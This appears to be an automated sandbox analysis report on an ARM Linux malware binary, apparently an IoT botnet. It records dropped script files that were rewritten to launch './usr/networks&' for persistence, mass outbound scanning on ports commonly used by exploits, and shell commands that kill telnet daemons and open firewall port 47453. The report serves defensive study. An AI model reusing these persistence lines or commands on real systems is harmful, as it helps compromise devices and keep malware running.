                                                                                                    Size (bytes):9649
                                                                                                    Entropy (8bit):5.350733164859712
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:mjHnCbuuH+ycHcTK8K8Ks89tg8C8Wdq7cmwc9bVxoY2uwt6fqI9lAnVKS4ID7KMz:ms7hBBC7pWdSK6SI8KzK77
                                                                                                    MD5:4E3AA249886275CE240D98F18CCB0B12
                                                                                                    SHA1:0E0A966CB506E61DE4F27571D3D3EF973AE70A94
                                                                                                    SHA-256:12D9472701FC5E974C36D6FB456F43063EC370CAB5AE42AF8E880C76031FD5B8
                                                                                                    SHA-512:5117AEB0CA27616A88CDB5C358078C2DF29784037C9D0CDFFE55F54441EBDC81B19FF6CB1356355EC35DFCABE0FD4AC514B18227ED78D486F66054CAD9E226FE
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. exit 2. fi.}...sanity_check().{. if [ "$(id -u)" != "0" ]; then . printf "\033[40m\033[1;31mERROR: Root check FAILED (you MUST be root to use this script)! Quitting...\n\033[0m" >&2. exit 1. fi.. check_binary mdadm. check_binary sfdisk. check_binary dd. check_binary awk. check_binary grep. check_binary sed. check_binary cat.. if [ -z "$SOURCE" ] || [ -z "$TARGET" ]; then. echo "ERROR: Bad or missing argument(s)" >&2. show_help;. exit 4. fi.. if ! echo "$SOURCE" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Source device $SOURCE does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if ! echo "$TARGET" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Target device $TARGET does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if echo "$SOURCE" |grep -q 'md[0-9]'; then. printf "\033[40m\033[1;31mERROR: The source device specified is an md-device! Quitting...\n\033[0m" >&2. e
                                                                                                    /usr/share/doc/netcat-openbsd/examples/dist.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):46
                                                                                                    Entropy (8bit):3.925523369006428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                    MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                    SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                    SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                    SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/tmux/examples/bash_completion_tmux.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/xdotool/examples/ffsp.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                    Entropy (8bit):5.819679405566689
                                                                                                    TrID:
                                                                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                    File name:bin.sh
                                                                                                    File size:307960
                                                                                                    MD5:eec5c6c219535fba3a0492ea8118b397
                                                                                                    SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
                                                                                                    SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
                                                                                                    SHA512:3482c8324a18302f0f37b6e23ed85f24fff9f50bb568d8fd7461bf57f077a7c592f7a88bb2e1c398699958946d87bb93ab744d13a0003f9b879c15e6471f7400
                                                                                                    SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                    File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                                                    Static ELF Info

                                                                                                    ELF header

                                                                                                    Class:ELF32
                                                                                                    Data:2's complement, little endian
                                                                                                    Version:1 (current)
                                                                                                    Machine:ARM
                                                                                                    Version Number:0x1
                                                                                                    Type:EXEC (Executable file)
                                                                                                    OS/ABI:UNIX - System V
                                                                                                    ABI Version:0
                                                                                                    Entry Point Address:0x8194
                                                                                                    Flags:0x4000002
                                                                                                    ELF Header Size:52
                                                                                                    Program Header Offset:52
                                                                                                    Program Header Size:32
                                                                                                    Number of Program Headers:5
                                                                                                    Section Header Offset:307280
                                                                                                    Section Header Size:40
                                                                                                    Number of Section Headers:17
                                                                                                    Header String Table Index:16

                                                                                                    Sections

                                                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                    NULL0x00x00x00x00x0000
                                                                                                    .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                                                    .textPROGBITS0x80f00xf00x34a980x00x6AX0016
                                                                                                    .finiPROGBITS0x3cb880x34b880x100x00x6AX004
                                                                                                    .rodataPROGBITS0x3cb980x34b980xb9d00x00x2A008
                                                                                                    .ARM.extabPROGBITS0x485680x405680x180x00x2A004
                                                                                                    .ARM.exidxARM_EXIDX0x485800x405800x1280x00x82AL204
                                                                                                    .eh_framePROGBITS0x510000x410000x40x00x3WA004
                                                                                                    .tbssNOBITS0x510040x410040x80x00x403WAT004
                                                                                                    .init_arrayINIT_ARRAY0x510040x410040x40x00x3WA004
                                                                                                    .fini_arrayFINI_ARRAY0x510080x410080x40x00x3WA004
                                                                                                    .data.rel.roPROGBITS0x510100x410100x180x00x3WA004
                                                                                                    .gotPROGBITS0x510280x410280xb80x40x3WA004
                                                                                                    .dataPROGBITS0x510e00x410e00x9ec80x00x3WA008
                                                                                                    .bssNOBITS0x5afa80x4afa80x25b900x00x3WA008
                                                                                                    .ARM.attributesARM_ATTRIBUTES0x00x4afa80x160x00x0001
                                                                                                    .shstrtabSTRTAB0x00x4afbe0x900x00x0001

                                                                                                    Program Segments

                                                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                    EXIDX0x405800x485800x485800x1280x1282.16810x4R 0x4.ARM.exidx
                                                                                                    LOAD0x00x80000x80000x406a80x406a83.50950x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                                                    LOAD0x410000x510000x510000x9fa80x2fb381.94540x6RW 0x8000.eh_frame .init_array .fini_array .data.rel.ro .got .data .bss
                                                                                                    TLS0x410040x510040x510040x00x80.00000x4R 0x4
                                                                                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                                                                                    Network Behavior

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 16, 2021 15:44:25.053913116 CET4885680192.168.2.205.89.214.135
                                                                                                    Nov 16, 2021 15:44:25.054054976 CET4392681192.168.2.20149.185.53.154
                                                                                                    Nov 16, 2021 15:44:25.054109097 CET4030481192.168.2.20155.61.123.253
                                                                                                    Nov 16, 2021 15:44:25.054177999 CET4191280192.168.2.20184.217.35.73
                                                                                                    Nov 16, 2021 15:44:25.054239035 CET4236880192.168.2.20110.57.200.132
                                                                                                    Nov 16, 2021 15:44:25.054300070 CET3823049152192.168.2.20105.137.202.218
                                                                                                    Nov 16, 2021 15:44:25.054358959 CET4208237215192.168.2.2099.37.65.129
                                                                                                    Nov 16, 2021 15:44:25.054410934 CET3359437215192.168.2.20175.141.183.193
                                                                                                    Nov 16, 2021 15:44:25.054471016 CET4796837215192.168.2.2084.60.151.77
                                                                                                    Nov 16, 2021 15:44:25.054531097 CET374708443192.168.2.20132.169.224.240
                                                                                                    Nov 16, 2021 15:44:25.054588079 CET334847574192.168.2.20207.49.85.172
                                                                                                    Nov 16, 2021 15:44:25.054653883 CET5246281192.168.2.20101.215.138.244
                                                                                                    Nov 16, 2021 15:44:25.054699898 CET3816480192.168.2.20146.159.89.38
                                                                                                    Nov 16, 2021 15:44:25.054760933 CET461188080192.168.2.20141.139.161.123
                                                                                                    Nov 16, 2021 15:44:25.054817915 CET4385280192.168.2.20217.128.81.132
                                                                                                    Nov 16, 2021 15:44:25.054881096 CET5308680192.168.2.20102.211.48.37
                                                                                                    Nov 16, 2021 15:44:25.054934025 CET4814449152192.168.2.20190.180.20.21
                                                                                                    Nov 16, 2021 15:44:25.055000067 CET445828080192.168.2.2097.152.141.58
                                                                                                    Nov 16, 2021 15:44:25.055063963 CET3427849152192.168.2.20132.35.122.63
                                                                                                    Nov 16, 2021 15:44:25.055113077 CET420427574192.168.2.20206.66.211.183
                                                                                                    Nov 16, 2021 15:44:25.055177927 CET4926280192.168.2.2041.22.25.103
                                                                                                    Nov 16, 2021 15:44:25.055222034 CET479788443192.168.2.205.69.78.55
                                                                                                    Nov 16, 2021 15:44:25.055280924 CET4730880192.168.2.2079.186.143.177
                                                                                                    Nov 16, 2021 15:44:25.055339098 CET5794680192.168.2.20109.147.241.154
                                                                                                    Nov 16, 2021 15:44:25.055392981 CET401848080192.168.2.20138.58.82.192
                                                                                                    Nov 16, 2021 15:44:25.055448055 CET4108649152192.168.2.2050.41.174.31
                                                                                                    Nov 16, 2021 15:44:25.055501938 CET3866280192.168.2.20205.51.46.8
                                                                                                    Nov 16, 2021 15:44:25.055553913 CET4983080192.168.2.2017.143.195.16
                                                                                                    Nov 16, 2021 15:44:25.055615902 CET3526880192.168.2.2070.97.76.208
                                                                                                    Nov 16, 2021 15:44:25.055672884 CET5262649152192.168.2.2085.233.216.179
                                                                                                    Nov 16, 2021 15:44:25.055725098 CET525808080192.168.2.20193.176.243.123
                                                                                                    Nov 16, 2021 15:44:25.055782080 CET4617280192.168.2.20209.136.182.147
                                                                                                    Nov 16, 2021 15:44:25.055859089 CET5083037215192.168.2.2059.17.48.95
                                                                                                    Nov 16, 2021 15:44:25.055922031 CET5609249152192.168.2.20176.127.83.100
                                                                                                    Nov 16, 2021 15:44:25.055984020 CET5428680192.168.2.2052.176.185.219
                                                                                                    Nov 16, 2021 15:44:25.056041002 CET5896080192.168.2.20163.49.20.154
                                                                                                    Nov 16, 2021 15:44:25.056101084 CET3923249152192.168.2.2034.144.108.84
                                                                                                    Nov 16, 2021 15:44:25.056159973 CET4342280192.168.2.20180.191.141.165
                                                                                                    Nov 16, 2021 15:44:25.056219101 CET4575049152192.168.2.20133.183.45.107
                                                                                                    Nov 16, 2021 15:44:25.056279898 CET5120680192.168.2.20217.32.46.116
                                                                                                    Nov 16, 2021 15:44:25.056344032 CET485528080192.168.2.2043.163.194.108
                                                                                                    Nov 16, 2021 15:44:25.056408882 CET3546852869192.168.2.2055.92.128.187
                                                                                                    Nov 16, 2021 15:44:25.056456089 CET4578880192.168.2.20221.38.227.70
                                                                                                    Nov 16, 2021 15:44:25.056509972 CET486647574192.168.2.2073.227.59.34
                                                                                                    Nov 16, 2021 15:44:25.056566000 CET5206052869192.168.2.20201.10.247.77
                                                                                                    Nov 16, 2021 15:44:25.056621075 CET536405555192.168.2.201.86.24.162
                                                                                                    Nov 16, 2021 15:44:25.056675911 CET500328080192.168.2.20117.145.177.145
                                                                                                    Nov 16, 2021 15:44:25.056730032 CET5255280192.168.2.20132.134.9.26
                                                                                                    Nov 16, 2021 15:44:25.056777954 CET600147574192.168.2.20124.193.58.88
                                                                                                    Nov 16, 2021 15:44:25.056829929 CET5868480192.168.2.20166.131.20.168
                                                                                                    Nov 16, 2021 15:44:25.056883097 CET536605555192.168.2.207.175.103.180
                                                                                                    Nov 16, 2021 15:44:25.056941986 CET5328680192.168.2.20207.100.187.60
                                                                                                    Nov 16, 2021 15:44:25.056986094 CET5548480192.168.2.2059.43.143.168
                                                                                                    Nov 16, 2021 15:44:25.057034016 CET5138081192.168.2.20103.98.158.56
                                                                                                    Nov 16, 2021 15:44:25.057095051 CET522628080192.168.2.20135.108.6.213
                                                                                                    Nov 16, 2021 15:44:25.057145119 CET5930680192.168.2.20164.50.133.207
                                                                                                    Nov 16, 2021 15:44:25.057195902 CET3331449152192.168.2.20125.113.60.52
                                                                                                    Nov 16, 2021 15:44:25.057255030 CET362768443192.168.2.2068.204.221.204
                                                                                                    Nov 16, 2021 15:44:25.057317019 CET564628080192.168.2.2096.243.133.72
                                                                                                    Nov 16, 2021 15:44:25.057372093 CET3452837215192.168.2.20144.110.172.80
                                                                                                    Nov 16, 2021 15:44:25.057426929 CET3685280192.168.2.2061.44.115.171
                                                                                                    Nov 16, 2021 15:44:25.057483912 CET422948080192.168.2.205.116.203.63
                                                                                                    Nov 16, 2021 15:44:25.057532072 CET524288080192.168.2.20205.102.198.206
                                                                                                    Nov 16, 2021 15:44:25.057585001 CET598228443192.168.2.2055.221.175.118
                                                                                                    Nov 16, 2021 15:44:25.057632923 CET482505555192.168.2.20159.239.202.226
                                                                                                    Nov 16, 2021 15:44:25.057686090 CET5523681192.168.2.201.229.187.151
                                                                                                    Nov 16, 2021 15:44:25.057733059 CET3594480192.168.2.20106.21.43.190
                                                                                                    Nov 16, 2021 15:44:25.057775974 CET354567574192.168.2.20185.69.187.126
                                                                                                    Nov 16, 2021 15:44:25.057823896 CET4248081192.168.2.20189.6.77.233
                                                                                                    Nov 16, 2021 15:44:25.057878017 CET3897452869192.168.2.2091.51.225.145
                                                                                                    Nov 16, 2021 15:44:25.057929039 CET3492081192.168.2.205.186.7.92
                                                                                                    Nov 16, 2021 15:44:25.057985067 CET3708280192.168.2.20209.69.172.190
                                                                                                    Nov 16, 2021 15:44:25.058037043 CET4005080192.168.2.20151.187.70.207
                                                                                                    Nov 16, 2021 15:44:25.058092117 CET415748443192.168.2.2031.116.224.12
                                                                                                    Nov 16, 2021 15:44:25.058144093 CET3865480192.168.2.20182.165.143.96
                                                                                                    Nov 16, 2021 15:44:25.058206081 CET5256649152192.168.2.2049.215.96.136
                                                                                                    Nov 16, 2021 15:44:25.058262110 CET5411637215192.168.2.2050.71.248.204
                                                                                                    Nov 16, 2021 15:44:25.058314085 CET3553280192.168.2.20215.154.56.20
                                                                                                    Nov 16, 2021 15:44:25.058371067 CET400068080192.168.2.20117.41.103.207
                                                                                                    Nov 16, 2021 15:44:25.058453083 CET3490837215192.168.2.2057.51.108.187
                                                                                                    Nov 16, 2021 15:44:25.058542013 CET3938280192.168.2.2023.148.123.67
                                                                                                    Nov 16, 2021 15:44:25.058598995 CET4682480192.168.2.20112.60.119.238
                                                                                                    Nov 16, 2021 15:44:25.058655977 CET5271881192.168.2.20151.214.152.36
                                                                                                    Nov 16, 2021 15:44:25.058732033 CET5878681192.168.2.20172.90.43.126
                                                                                                    Nov 16, 2021 15:44:25.058801889 CET426308080192.168.2.20210.87.19.176
                                                                                                    Nov 16, 2021 15:44:25.058916092 CET5051080192.168.2.20198.117.58.80
                                                                                                    Nov 16, 2021 15:44:25.059010983 CET457528080192.168.2.2052.46.146.246
                                                                                                    Nov 16, 2021 15:44:25.059101105 CET4148880192.168.2.2027.10.242.140
                                                                                                    Nov 16, 2021 15:44:25.059205055 CET465325555192.168.2.20163.196.185.185
                                                                                                    Nov 16, 2021 15:44:25.059290886 CET5061449152192.168.2.20138.7.59.44
                                                                                                    Nov 16, 2021 15:44:25.059387922 CET5824052869192.168.2.206.141.67.12
                                                                                                    Nov 16, 2021 15:44:25.059492111 CET5713680192.168.2.20134.220.42.245
                                                                                                    Nov 16, 2021 15:44:25.059591055 CET4927080192.168.2.2030.200.81.5
                                                                                                    Nov 16, 2021 15:44:25.059675932 CET3989080192.168.2.2059.228.67.157
                                                                                                    Nov 16, 2021 15:44:25.059768915 CET5403649152192.168.2.20182.183.14.60
                                                                                                    Nov 16, 2021 15:44:25.059899092 CET4846080192.168.2.20114.54.211.78
                                                                                                    Nov 16, 2021 15:44:25.059999943 CET337005555192.168.2.20213.37.141.115
                                                                                                    Nov 16, 2021 15:44:25.060087919 CET5721680192.168.2.20178.45.43.12
                                                                                                    Nov 16, 2021 15:44:25.060148001 CET510128080192.168.2.2089.150.101.206
                                                                                                    Nov 16, 2021 15:44:25.060208082 CET475887574192.168.2.20126.180.188.226

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                    Nov 16, 2021 15:44:46.528378963 CET192.168.2.208.8.8.80x2Standard query (0)dht.transmissionbt.comA (IP address)IN (0x0001)
                                                                                                    Nov 16, 2021 15:44:46.555077076 CET192.168.2.208.8.8.80x3Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)
                                                                                                    Nov 16, 2021 15:44:46.575975895 CET192.168.2.208.8.8.80x4Standard query (0)router.utorrent.comA (IP address)IN (0x0001)
                                                                                                    Nov 16, 2021 15:44:46.597414017 CET192.168.2.208.8.8.80x5Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                    Nov 16, 2021 15:44:46.551172018 CET8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com87.98.162.88A (IP address)IN (0x0001)
                                                                                                    Nov 16, 2021 15:44:46.551172018 CET8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com212.129.33.59A (IP address)IN (0x0001)
                                                                                                    Nov 16, 2021 15:44:46.574167013 CET8.8.8.8192.168.2.200x3No error (0)router.bittorrent.com67.215.246.10A (IP address)IN (0x0001)
                                                                                                    Nov 16, 2021 15:44:46.595403910 CET8.8.8.8192.168.2.200x4No error (0)router.utorrent.com82.221.103.244A (IP address)IN (0x0001)
                                                                                                    Nov 16, 2021 15:44:46.616626024 CET8.8.8.8192.168.2.200x5No error (0)bttracker.debian.orgbttracker.acc.umu.seCNAME (Canonical name)IN (0x0001)
                                                                                                    Nov 16, 2021 15:44:46.616626024 CET8.8.8.8192.168.2.200x5No error (0)bttracker.acc.umu.se130.239.18.158A (IP address)IN (0x0001)

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • 221.128.175.114:80
                                                                                                    • 127.0.0.1:80
                                                                                                    • 52.54.104.1:80
                                                                                                    • 3.113.149.148:80
                                                                                                    • 122.201.116.141:80
                                                                                                    • 201.49.41.72:80
                                                                                                    • 216.180.103.7:80
                                                                                                    • 175.119.69.229:80
                                                                                                    • 112.74.206.52:80

                                                                                                    System Behavior

                                                                                                    Analysis Process: bin.sh PID: 6777 Parent PID: 6712

                                                                                                    General

                                                                                                    Start time:15:44:18
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:/usr/bin/qemu-arm /tmp/bin.sh
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: bin.sh PID: 6790 Parent PID: 6777

                                                                                                    General

                                                                                                    Start time:15:44:18
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: bin.sh PID: 6792 Parent PID: 6790

                                                                                                    General

                                                                                                    Start time:15:44:18
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: bin.sh PID: 6794 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:18
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 6794 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:18
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 6797 Parent PID: 6794

                                                                                                    General

                                                                                                    Start time:15:44:18
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: killall PID: 6797 Parent PID: 6794

                                                                                                    General

                                                                                                    Start time:15:44:18
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/usr/bin/killall
                                                                                                    Arguments:killall -9 telnetd utelnetd scfgmgr
                                                                                                    File size:23736 bytes
                                                                                                    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

                                                                                                    Analysis Process: bin.sh PID: 6813 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:19
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: bin.sh PID: 6814 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:19
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: bin.sh PID: 6815 Parent PID: 6792

                                                                                                    General

                                                                                                    Start time:15:44:19
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: bin.sh PID: 6825 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 6825 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT"
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: sh PID: 6827 Parent PID: 6825

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:4 bytes
                                                                                                    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                    Analysis Process: iptables PID: 6827 Parent PID: 6825

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: iptables PID: 6842 Parent PID: 6827

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/iptables
                                                                                                    Arguments:n/a
                                                                                                    File size:13 bytes
                                                                                                    MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                    Analysis Process: modprobe PID: 6842 Parent PID: 6827

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/sbin/modprobe
                                                                                                    Arguments:/sbin/modprobe ip_tables
                                                                                                    File size:9 bytes
                                                                                                    MD5 hash:3d0e6fb594a9ad9c854ace3e507f86c5

                                                                                                    Analysis Process: bin.sh PID: 6855 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
                                                                                                    Path:/tmp/bin.sh
                                                                                                    Arguments:n/a
                                                                                                    File size:307960 bytes
                                                                                                    MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                    Analysis Process: sh PID: 6855 Parent PID: 6815

                                                                                                    General

                                                                                                    Start time:15:44:34
                                                                                                    Start date:16/11/2021
